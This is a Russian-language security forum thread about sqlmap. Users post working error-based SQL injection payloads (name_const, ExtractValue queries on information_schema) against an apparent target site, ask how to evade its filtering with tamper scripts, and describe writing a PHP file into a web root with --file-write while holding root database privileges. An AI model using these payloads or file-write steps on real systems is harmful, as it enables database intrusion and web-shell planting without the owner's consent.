• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Вопрос по sqlmap

ArsenalWest

Member
19.03.2020
9
0
BIT
19
Помогите пожалуйста составить запрос для sqlmap
Код:
site.biz/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1/
 

Вложения

  • 2020-06-20_232627.png
    2020-06-20_232627.png
    4,8 КБ · Просмотры: 193

ArsenalWest

Member
19.03.2020
9
0
BIT
19
.biz/1'or(ExtractValue(1,concat(0x3a,(SELECT/**/TABLE_NAME/**/FROM/**/information_schema.TABLES/**/LIMIT/**/40,1),(':'))))--'
Имя бд выдает. Подскажите вектор для sqlmap
space2comment не помогает
 

msksmail

Grey Team
29.09.2016
14
21
BIT
296
1. нужно смотреть что фильтрует, ставь verbose 3 минимум
2. space2comment заменяет пробелы “/ ** /” и это не панацея, программа просит использовать тампер и в пример ставит space2comment. Тамперов много, можно что-то написать самому если ничего из базы не подойдет
3. можно использовать сразу несколько тамперов и не забудь еще про --hex или --no-cast
 

my3uka

Member
20.04.2019
15
0
BIT
0
Здравствуйте, спрошу сдесь.
Запись файла на сервер успешна, файл есть на сервере, также он работает через браузер, также он есть если смотреть через шелл.

is-dba: true
user: root
privilege : ALL

sqlmap --file-write=test.php --file-desk=/var/www/my_site/test.php

Потом я хочу его прочитать sqlmap --file-read=/var/www/my_site/test.php, sqlmap не может его прочитать.
Код:
 [ERROR] no data retrieved

Немогу понять, или ето sqlmap не работает или ??? Запись работает, а чтение нет, как так?
 

InetTester

Green Team
21.10.2018
308
43
BIT
5
Здравствуйте, спрошу сдесь.
Запись файла на сервер успешна, файл есть на сервере, также он работает через браузер, также он есть если смотреть через шелл.

is-dba: true
user: root
privilege : ALL

sqlmap --file-write=test.php --file-desk=/var/www/my_site/test.php

Потом я хочу его прочитать sqlmap --file-read=/var/www/my_site/test.php, sqlmap не может его прочитать.
Код:
 [ERROR] no data retrieved

Немогу понять, или ето sqlmap не работает или ??? Запись работает, а чтение нет, как так?

Попробуй его wget-ом или curl-ом и посмотри код ошибки который вернет тебе сервер.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!